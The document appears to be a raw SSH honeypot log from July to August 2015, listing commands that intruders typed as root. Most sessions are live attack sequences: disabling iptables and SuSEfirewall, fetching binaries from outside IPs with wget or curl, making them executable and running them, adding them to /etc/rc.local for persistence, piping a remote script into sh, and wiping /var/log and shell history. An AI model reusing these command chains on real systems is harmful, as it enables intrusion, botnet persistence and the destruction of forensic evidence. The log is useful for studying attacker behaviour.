| grep inet |wc -l w From 193.111.232.132 9-Jul-2015 16:15:17 ssh2 root id ls -a pwd pico .bash_history From 193.111.232.132 9-Jul-2015 21:08:21 ssh2 root pico .bash_history cd .ICE-unix ls -a pwd ls mkdir ,. wget From 112.114.15.13 9-Jul-2015 22:21:09 ssh2 root uname -a ps -e ips -e From 193.111.232.132 10-Jul-2015 02:01:25 ssh2 root wget http://safe.home.ro/psy.jpg From 193.111.232.132 10-Jul-2015 06:54:29 ssh2 root wget -O http://safe.home.ro/psy.jpg w wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.21.tar.gz From 193.111.232.132 10-Jul-2015 11:47:33 ssh2 root curl -O wget -O http://safe.home.ro/psy.jpg history -c vi .bash_history cd /root id ps ps a history -c From 193.111.232.132 10-Jul-2015 16:40:37 ssh2 root history -c -d offset unset HISTFILE unset HISTSAVE history -c -d offset unset HISTFILE export HISTFILE=/dev/null w id pwd ls cd Mail ls ls -a d pwd ls /root/Mail cd Mail ls pwd cd Mail pwd id ls -a cd /root cd .ssh pwd From 193.111.232.132 10-Jul-2015 21:33:41 ssh2 root id pwd cd fgjfdjifijjijgeji cd .. ls w id adduser add useradd cmds help ? history -c reboot From 193.111.232.132 11-Jul-2015 02:26:45 ssh2 root reload 2 w server menu From 61.166.50.82 11-Jul-2015 05:18:15 ssh2 root root@104.245.38.24's password: Linux localhost 2.6.32 #4 SMP Wed From 61.166.50.82 11-Jul-2015 15:37:17 ssh2 root uname -a ps -e wget wget http://14.29.49.36:9090/yu-x From 193.111.232.55 11-Jul-2015 21:59:01 ssh2 root history -c -d offset unset HISTFILE unset HISTSAVE history -n unset WATCH export HISTFILE=/dev/null w ps a ps x uname -a cat /proc/cpuinfo pwd ls -a cd .wmrc ls -a wget wget safe.home.ro/muh.jpg wget -P safe.home.ro/muh.jpg wget -P safe.home.ro/muh.jpg -P history -c From 84.117.124.72 12-Jul-2015 01:56:19 ssh2 root uname -a ps x cat /proc/cpuinfo ls -a uname -a ifconfig w cd /usr/local/games ls a cd nsmail ls -a ls -all ls -a ls cd .. rm -rf * ls -a cd .bash_history cat .bash_history cd /usr/local/games yum apt-get apt-get install build-essential libssl-dev libpam-dev apt-get install openssl-devel pam-devel cat /etc/hosts apt-get groupinstall "Development Tools" apt-get install gcc wget clubby.ucoz.com/sniff.tgz tar zxfv sniff.tgz rm -rf sniff.tgz cd ip.h ./inst ceckspamroot 22 apt-get install tar wget http://clubby.ucoz.com/sniff.tgz wget -c http://clubby.ucoz.com/sniff.tgz wget clubby.ucoz.com/skdet.tgz tar zxfv skdet.tgz rm -rf skdet.tgz cd skdet chmod +x * ./bleah 84.117.124.72 tar ls -a cat /etc/issue ps x ifconfig From 84.117.124.72 12-Jul-2015 12:15:21 ssh2 root ls -a apt-get install upgrade From 86.125.24.14 12-Jul-2015 22:24:21 ssh2 root ls perl test.pl ls cd / cd cd / ls From 84.117.124.72 12-Jul-2015 22:34:23 ssh2 root curl -O ls -a cd .. rm -rf * cd .. rm -rf * history -c exit From 77.247.181.162 13-Jul-2015 08:53:25 ssh2 root w ps -aux ifconfig history cat /proc/cpuinfo cat /etc/issue uname -a From 84.117.124.72 13-Jul-2015 19:12:27 ssh2 root w ps x apt-get install linux* apt-get install debian* ls -a apt-get install DEbian* apt-get update apt-get install update apt-get install Debian apt-get install yum yum history -c exit wget history cat /etc/issue wget -c ircdu.6te.net/g.tgz From 27.255.81.38 13-Jul-2015 22:49:41 ssh2 root ps -ef wget http://117.18.4.70:7777/ttfacai chmod +x ttfacai ./ttfacai chattr +i ps -ef From 27.255.83.177 14-Jul-2015 18:21:57 ssh2 root ps -ef passwd From 112.114.14.205 16-Jul-2015 09:06:39 ssh2 root uname -a ps -e From 49.64.229.238 18-Jul-2015 10:17:09 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.28.206.48:9981/s25;chmod 777 s25;./s25; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.28.206.48:9981/s25 chmod 777 s25 ./s25 From 117.60.215.27 19-Jul-2015 10:42:29 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.28.206.48:10591/140;chmod 777 140;./140; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.28.206.48:10591/140 chmod 777 140 ./140 From 117.60.215.27 19-Jul-2015 15:35:33 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.28.206.48:10591/s25;chmod 777 s25;./s25; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.28.206.48:10591/s25 chmod 777 s25 ./s25 From 91.214.169.69 19-Jul-2015 19:38:55 ssh2 root w cat /etc/issue yum gcc cd /tmp wget d0s.cc/fix curl -O d0s.cc/fix From 222.186.3.179 20-Jul-2015 01:21:41 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.28.206.48:10591/2897;chmod 777 2897;./2897; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.28.206.48:10591/2897 chmod 777 2897 ./2897 From 222.186.21.14 20-Jul-2015 06:14:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.14:8080/135;chmod 777 135;./135; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.21.14:8080/135 chmod 777 135 ./135 From 211.143.31.139 21-Jul-2015 02:36:01 ssh2 root Exec wget -qO - http://104.199.135.124/bbsh | sh > /dev/null 2>&1 & wget -qO - http://104.199.135.124/bbsh | sh > /dev/null From 213.152.161.10 21-Jul-2015 23:14:05 ssh2 root w cat /etc/issue yum From 118.193.232.16 22-Jul-2015 02:12:21 ssh2 root passwd dsfdhjlkljkjhghfgdfdgjhkfdgfhghfgfg passwd dsfdhjlkljkjhghfgdfdgjhkfdgfhghfgfgps -ef ps -ef passwd From 178.20.152.151 23-Jul-2015 07:30:45 ssh2 root w ps x uname -a ls -a ifconfig wget wget http://bali.do.am/c.jpg cd perl yum install perl apt-get install perl perl wget uname -a From 94.217.47.41 23-Jul-2015 12:23:49 ssh2 root history -c exit From 222.186.26.174 23-Jul-2015 14:08:43 ssh2 root cd .ssh ls -a vi known_hosts ifconfig ethtool eth0 cd /bin wget http://199.83.94.136:6555/kil curl -O http://199.83.94.136:6555/kil wget http://199.83.94.136:6555/kil wget -s http://199.83.94.136:6555/kil From 178.20.152.151 23-Jul-2015 17:16:53 ssh2 root ps x rebote ps x ls -a curl -O exit From 58.221.44.81 24-Jul-2015 03:03:01 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://58.221.44.81:9993/as1.0;chmod 777 as1.0;./as1.0;echo "cd /tmp/">>/etc/rc.local;echo "./as1.0&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://58.221.44.81:9993/as1.0 chmod 777 as1.0 ./as1.0 echo "cd /tmp/">>/etc/rc.local echo "./as1.0&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 96.254.141.18 24-Jul-2015 13:08:17 ssh2 root uname -a uptime uname -a wget wget cross-panel.tk/scan/y.txtwget cross-panel.tk/scan/y.txt wget cross-panel.tk/scan/y.txt -c [-c From 222.186.56.120 24-Jul-2015 22:35:17 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.28.206.48:3128/145;chmod 777 145;./145; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.28.206.48:3128/145 chmod 777 145 ./145 From 64.71.79.121 25-Jul-2015 13:14:29 ssh2 root wget http://111.74.239.61:8282/260 From 103.20.249.191 26-Jul-2015 13:39:49 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.20.249.191:5198/rwd;chmod 777 rwd;./rwd; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://103.20.249.191:5198/rwd chmod 777 rwd ./rwd From 103.39.79.93 26-Jul-2015 16:43:27 ssh2 root uname -a ps -ef ps -ef From 79.126.142.55 28-Jul-2015 14:30:29 ssh2 root uptime uname a- From 222.186.58.79 29-Jul-2015 10:02:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.58.79:7781/Linu8;chmod 777 Linu8;./Linu8; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.58.79:7781/Linu8 chmod 777 Linu8 ./Linu8 From 199.217.118.155 31-Jul-2015 06:00:21 ssh2 root Exec /var/.udp/.z1 & /var/.udp/.z2 & /var/.udp/.z3 & /var/.udp/.z4 & /var/.udp/.z5 & /var/.udp/.z6 & /var/.udp/.z7 & /var/.udp/.z8 & /var/.udp/.z9 & /var/.udp/.z10 & /var/.udp/.z11 & /var/.udp/.z12 ; rm -rf /var/log/* ; rm -rf /root/.bash_history /var/.udp/.z1 & /var/.udp/.z2 & /var/.udp/.z3 & /var/.udp/.z4 & rm -rf /var/log/* rm -rf /root/.bash_history From 209.239.123.82 31-Jul-2015 10:53:25 ssh2 root Exec /sbin/ifconfig /sbin/ifconfig From 88.85.253.230 3-Aug-2015 02:23:17 ssh2 root uname -a ifconfig wget sudo apt-get apt-get update sudo su uname -L uname -a ifconfig exit From 95.218.1.156 3-Aug-2015 07:16:21 ssh2 root sudo chmod 775 auth.log uname -a adduser exit From 184.107.237.98 3-Aug-2015 12:09:25 ssh2 root Exec wget ftp://ftp.ugotownedz.org/Xorg -O /tmp/Xorg;wget ftp://ftp.ugotownedz.org/Xorg -O /tmp/Xorg;curl -o /tmp/Xorg ftp://ftp.ugotownedz.org/Xorg;GET ftp://ftp.ugotownedz.org/Xorg;fetch ftp://ftp.ugotownedz.org/Xorg;lwp-download ftp://ftp.ugotownedz.org/Xorg;chmod +x /tmp/Xorg;chmod +x Xorg;perl /tmp/Xorg;rm -rf /tmp/Xorg*;rm -rf Xorg*;wget ftp://ftp.ugotownedz.org/upfile2.sh -O /tmp/upfile2.sh;wget ftp://ftp.ugotownedz.org/upfile2.sh -O /tmp/upfile2.sh;curl -o /tmp/upfile2.sh ftp://ftp.ugotownedz.org/upfile2.sh;GET ftp://ftp.ugotownedz.org/upfile2.sh;fetch ftp://ftp.ugotownedz.org/upfile2.sh;lwp-download ftp://ftp.ugotownedz.org/upfile2.sh;chmod +x /tmp/upfile2.sh;chmod +x upfile2.sh;sh /tmp/upfile2.sh ftp.ugotownedz.org ;rm -rf /tmp/upfile2.sh*;rm -rf upfile2.sh*;wget ftp://ftp.ugotownedz.org/decriss2 -O /tmp/decriss2;wget ftp://ftp.ugotownedz.org/decriss2 -O /tmp/decriss2;curl -o /tmp/decriss2 ftp://ftp.ugotownedz.org/decriss2;GET ftp://ftp.ugotownedz.org/decriss2;fetch ftp://ftp.ugotownedz.org/decriss2;lwp-download ftp://ftp.ugotownedz.org/decriss2;chmod +x /tmp/decriss2;chmod +x decriss2;sh /tmp/decriss2 ftp.ugotownedz.org ;rm -rf /tmp/decriss2*;rm -rf decriss2*; rm -rf /root/.bash_history; rm -rf /var/log/* wget ftp://ftp.ugotownedz.org/Xorg -O /tmp/Xorg curl -o /tmp/Xorg ftp://ftp.ugotownedz.org/Xorg GET ftp://ftp.ugotownedz.org/Xorg fetch ftp://ftp.ugotownedz.org/Xorg lwp-download ftp://ftp.ugotownedz.org/Xorg chmod +x /tmp/Xorg chmod +x Xorg perl /tmp/Xorg rm -rf /tmp/Xorg* rm -rf Xorg* wget ftp://ftp.ugotownedz.org/upfile2.sh -O /tmp/upfile2.sh curl -o /tmp/upfile2.sh ftp://ftp.ugotownedz.org/upfile2.sh GET ftp://ftp.ugotownedz.org/upfile2.sh fetch ftp://ftp.ugotownedz.org/upfile2.sh lwp-download ftp://ftp.ugotownedz.org/upfile2.sh chmod +x /tmp/upfile2.sh chmod +x upfile2.sh sh /tmp/upfile2.sh ftp.ugotownedz.org rm -rf /tmp/upfile2.sh* rm -rf upfile2.sh* wget ftp://ftp.ugotownedz.org/decriss2 -O /tmp/decriss2 curl -o /tmp/decriss2 ftp://ftp.ugotownedz.org/decriss2 GET ftp://ftp.ugotownedz.org/decriss2 fetch ftp://ftp.ugotownedz.org/decriss2 lwp-download ftp://ftp.ugotownedz.org/decriss2 chmod +x /tmp/decriss2 chmod +x decriss2 sh /tmp/decriss2 ftp.ugotownedz.org rm -rf /tmp/decriss2* rm -rf decriss2* rm -rf /root/.bash_history rm -rf /var/log/* From 14.215.113.212 6-Aug-2015 00:20:15 ssh2 root Exec cd /var cd /var From 42.115.118.143 6-Aug-2015 20:58:19 ssh2 root Exec ls -an ls -an From 115.144.166.165 7-Aug-2015 17:36:23 ssh2 root ps -ef ls From 62.201.215.146 7-Aug-2015 23:36:53 ssh2 root ls nano tst.pl yum install nano apt-get install nano clear cd ls nano tst.pl From 83.110.107.122 8-Aug-2015 04:29:57 ssh2 root cd .. ls cd .. ls cd /var/tmp ls cd ls exot exit From 93.190.139.152 10-Aug-2015 17:49:37 ssh2 root Exec cat /etc/issue ; cat /etc/centos-release ; uname -a ; echo === ; cat /proc/cpuinfo | grep "model name" ; echo === ; ifconfig ; echo === ; echo === ; gcc ; df -h cat /etc/issue cat /etc/centos-release uname -a echo === cat /proc/cpuinfo | grep "model name" echo === ifconfig echo === gcc df -h From 115.28.206.48 10-Aug-2015 19:59:49 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.28.206.48:8080/2897;chmod 777 2897;./2897; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.28.206.48:8080/2897 chmod 777 2897 ./2897 From 82.146.61.32 11-Aug-2015 04:08:39 ssh2 root Exec busybox busybox From 82.146.61.32 11-Aug-2015 14:27:41 ssh2 root Exec echo "nameserver 8.8.8.8" > /etc/resolv.conf echo "nameserver 8.8.8.8" > /etc/resolv.conf From 81.28.96.74 12-Aug-2015 20:50:29 ssh2 root ls ls -a yum install -y centos-release-SCL yum install -y python27 apt-get install python27 ls cd / ls cd / ls From 81.28.96.74 13-Aug-2015 01:43:33 ssh2 root cd / ls cd root ls cd / cd user ls cd python ls cd python27 ls From 81.196.243.142 13-Aug-2015 06:36:37 ssh2 root ls ls -a cd / ls -a cd user ls -a From 88.85.253.230 13-Aug-2015 21:15:49 ssh2 root uname -a ifconfig sudo adduser intel adduser intel 123456 ls help uname -a ifsonfig ifconfig apt-get sudo apt-get install sudo sudo wget user add adduser sudo apt-get update apt-get --update exit From 86.120.225.207 16-Aug-2015 22:31:49 ssh2 root ls ssh ls -a w ifconfig sudo apt-get update -y sudo apt-get update apt-get install sudo apt-get update apt-get update -y sudo apt-get update -y sudo apt-get upgrade -y sudo apt-get upgrade -y apt-get upgrade -y upgrade From 122.236.240.239 18-Aug-2015 11:32:13 ssh2 root ss ls cd /root cd ss netstat -antp uname -a wget http://112.124.65.90:23456/jb curl http://112.124.65.90:23456/jb -O /root/jb From 192.169.180.138 19-Aug-2015 04:15:33 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd ..; cd /tmp; rm -f *; wget -c http://192.169.180.138:55678/10991fuck; chmod 777 10991fuck; ./10991fuck; echo "cd /tmp/">>/etc/rc.local; echo "./10991fuck&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd .. cd /tmp rm -f * wget -c http://192.169.180.138:55678/10991fuck chmod 777 10991fuck ./10991fuck echo "cd /tmp/">>/etc/rc.local echo "./10991fuck&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 192.169.180.138 19-Aug-2015 23:47:49 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd ..; cd /tmp; wget -c http://192.169.180.138:55678/10991fuck; chmod 777 10991fuck; ./10991fuck; echo "cd /tmp/">>/etc/rc.local; echo "./10991fuck&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd .. cd /tmp wget -c http://192.169.180.138:55678/10991fuck chmod 777 10991fuck ./10991fuck echo "cd /tmp/">>/etc/rc.local echo "./10991fuck&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 180.97.220.28 20-Aug-2015 19:20:05 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd /tmp; wget -c http://180.97.220.28:8080/wo; chmod 777 wo; ./wo; echo "cd /tmp/">>/etc/rc.local; echo "./wo&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://180.97.220.28:8080/exe; chmod 777 exe; ./exe; echo "cd /tmp/">>/etc/rc.local; echo "./exe&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://180.97.220.28:8080/wo chmod 777 wo ./wo echo "cd /tmp/">>/etc/rc.local echo "./wo&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://180.97.220.28:8080/exe chmod 777 exe ./exe echo "cd /tmp/">>/etc/rc.local echo "./exe&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 192.169.180.138 21-Aug-2015 05:06:13 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd ..; cd /tmp; wget -c http://192.169.180.138:55678/u58595; chmod 777 u58595; ./u58595; echo "cd /tmp/">>/etc/rc.local; echo "./u58595&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://192.169.180.138:55678/s58595; chmod 777 s58595; ./s58595; echo "cd /tmp/">>/etc/rc.local; echo "./s58595&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd .. cd /tmp wget -c http://192.169.180.138:55678/u58595 chmod 777 u58595 ./u58595 echo "cd /tmp/">>/etc/rc.local echo "./u58595&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://192.169.180.138:55678/s58595 chmod 777 s58595 ./s58595 echo "cd /tmp/">>/etc/rc.local echo "./s58595&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 222.187.239.242 21-Aug-2015 14:52:21 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.187.239.242:4764/syn7777;chmod 777 syn7777;./syn7777;echo "cd /tmp/">>/etc/rc.local;echo "./syn7777&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://222.187.239.242:4764/syn7777 chmod 777 syn7777 ./syn7777 echo "cd /tmp/">>/etc/rc.local echo "./syn7777&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 192.169.180.138 22-Aug-2015 05:31:33 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd ..; cd /tmp; wget -c http://192.169.180.138:55678/u58595; chmod 777 u58595; ./u58595; echo "cd /tmp/">>/etc/rc.local; echo "./u58595&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://192.169.180.138:55678/s58595; chmod 777 s58595; ./s58595; echo "cd /tmp/">>/etc/rc.local; echo "./s58595&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://192.169.180.138:55678/10992fuck; chmod 777 10992fuck; ./10992fuck; echo "cd /tmp/">>/etc/rc.local; echo "./10992fuck&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd .. cd /tmp wget -c http://192.169.180.138:55678/u58595 chmod 777 u58595 ./u58595 echo "cd /tmp/">>/etc/rc.local echo "./u58595&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://192.169.180.138:55678/s58595 chmod 777 s58595 ./s58595 echo "cd /tmp/">>/etc/rc.local echo "./s58595&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://192.169.180.138:55678/10992fuck chmod 777 10992fuck ./10992fuck echo "cd /tmp/">>/etc/rc.local echo "./10992fuck&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 192.169.180.138 22-Aug-2015 15:17:41 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd ..; cd /tmp; wget -c http://192.169.180.138:55678/monitorv3; chmod 777 monitorv3; ./monitorv3; echo "cd /tmp/">>/etc/rc.local; echo "./monitorv3&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://192.169.180.138:55678/u58595; chmod 777 u58595; ./u58595; echo "cd /tmp/">>/etc/rc.local; echo "./u58595&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://192.169.180.138:55678/s58595; chmod 777 s58595; ./s58595; echo "cd /tmp/">>/etc/rc.local; echo "./s58595&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://192.169.180.138:55678/10991fuck; chmod 777 10991fuck; ./10991fuck; echo "cd /tmp/">>/etc/rc.local; echo "./10991fuck&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd .. cd /tmp wget -c http://192.169.180.138:55678/monitorv3 chmod 777 monitorv3 ./monitorv3 echo "cd /tmp/">>/etc/rc.local echo "./monitorv3&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://192.169.180.138:55678/u58595 chmod 777 u58595 ./u58595 echo "cd /tmp/">>/etc/rc.local echo "./u58595&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://192.169.180.138:55678/s58595 chmod 777 s58595 ./s58595 echo "cd /tmp/">>/etc/rc.local echo "./s58595&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://192.169.180.138:55678/10991fuck chmod 777 10991fuck ./10991fuck echo "cd /tmp/">>/etc/rc.local echo "./10991fuck&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 180.97.220.28 23-Aug-2015 10:49:57 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd /tmp; wget -c http://180.97.220.28:8080/syn28; chmod 777 syn28; ./syn28; echo "cd /tmp/">>/etc/rc.local; echo "./syn28&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://180.97.220.28:8080/udp28; chmod 777 udp28; ./udp28; echo "cd /tmp/">>/etc/rc.local; echo "./udp28&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://180.97.220.28:8080/123456; chmod 777 123456; ./123456; echo "cd /tmp/">>/etc/rc.local; echo "./123456&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://180.97.220.28:8080/syn28 chmod 777 syn28 ./syn28 echo "cd /tmp/">>/etc/rc.local echo "./syn28&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://180.97.220.28:8080/udp28 chmod 777 udp28 ./udp28 echo "cd /tmp/">>/etc/rc.local echo "./udp28&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://180.97.220.28:8080/123456 chmod 777 123456 ./123456 echo "cd /tmp/">>/etc/rc.local echo "./123456&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 192.169.180.138 23-Aug-2015 20:36:05 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd ..; cd /tmp; wget -c http://192.169.180.138:55678/123456; chmod 777 123456; ./123456; echo "cd /tmp/">>/etc/rc.local; echo "./123456&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://192.169.180.138:55678/u58595; chmod 777 u58595; ./u58595; echo "cd /tmp/">>/etc/rc.local; echo "./u58595&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://192.169.180.138:55678/s58595; chmod 777 s58595; ./s58595; echo "cd /tmp/">>/etc/rc.local; echo "./s58595&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://192.169.180.138:55678/10991fuck; chmod 777 10991fuck; ./10991fuck; echo "cd /tmp/">>/etc/rc.local; echo "./10991fuck&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd .. cd /tmp wget -c http://192.169.180.138:55678/123456 chmod 777 123456 ./123456 echo "cd /tmp/">>/etc/rc.local echo "./123456&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://192.169.180.138:55678/u58595 chmod 777 u58595 ./u58595 echo "cd /tmp/">>/etc/rc.local echo "./u58595&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://192.169.180.138:55678/s58595 chmod 777 s58595 ./s58595 echo "cd /tmp/">>/etc/rc.local echo "./s58595&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://192.169.180.138:55678/10991fuck chmod 777 10991fuck ./10991fuck echo "cd /tmp/">>/etc/rc.local echo "./10991fuck&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 182.40.231.171 24-Aug-2015 01:39:39 ssh2 root ifconfig ethtool eth0 mover mover -tnp mver -tnp cd /sbin ls -la wget http://222.186.34.91:6513/sqlrer wget -c http://222.186.34.91:6513/sqlrer history -c exit From 192.169.180.138 24-Aug-2015 11:15:17 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd ..; cd /tmp; rm -f *; wget -c http://192.169.180.138:55678/u58595; chmod 777 u58595; ./u58595; echo "cd /tmp/">>/etc/rc.local; echo "./u58595&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://192.169.180.138:55678/s58595; chmod 777 s58595; ./s58595; echo "cd /tmp/">>/etc/rc.local; echo "./s58595&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://192.169.180.138:55678/10991fuck; chmod 777 10991fuck; ./10991fuck; echo "cd /tmp/">>/etc/rc.local; echo "./10991fuck&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd .. cd /tmp rm -f * wget -c http://192.169.180.138:55678/u58595 chmod 777 u58595 ./u58595 echo "cd /tmp/">>/etc/rc.local echo "./u58595&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://192.169.180.138:55678/s58595 chmod 777 s58595 ./s58595 echo "cd /tmp/">>/etc/rc.local echo "./s58595&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://192.169.180.138:55678/10991fuck chmod 777 10991fuck ./10991fuck echo "cd /tmp/">>/etc/rc.local echo "./10991fuck&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 42.242.153.101 25-Aug-2015 08:42:11 ssh2 root wget http://125.88.186.86:3306/a-xb-a chmod 777 a-xb-a ./a-xb-a From 42.242.153.101 25-Aug-2015 19:03:09 ssh2 root uname -a wget http://125.88.186.86:3306/a-xb-a chmod 777 a-xb-a ./a-xb-a curl From 14.157.75.11 27-Aug-2015 17:24:21 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd /tmp; wget -c http://222.187.223.230:6666/25000; chmod 777 25000; ./25000; echo "cd /tmp/">>/etc/rc.local; echo "./25000&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://222.187.223.230:6666/25000 chmod 777 25000 ./25000 echo "cd /tmp/">>/etc/rc.local echo "./25000&">>/etc/rc.local echo 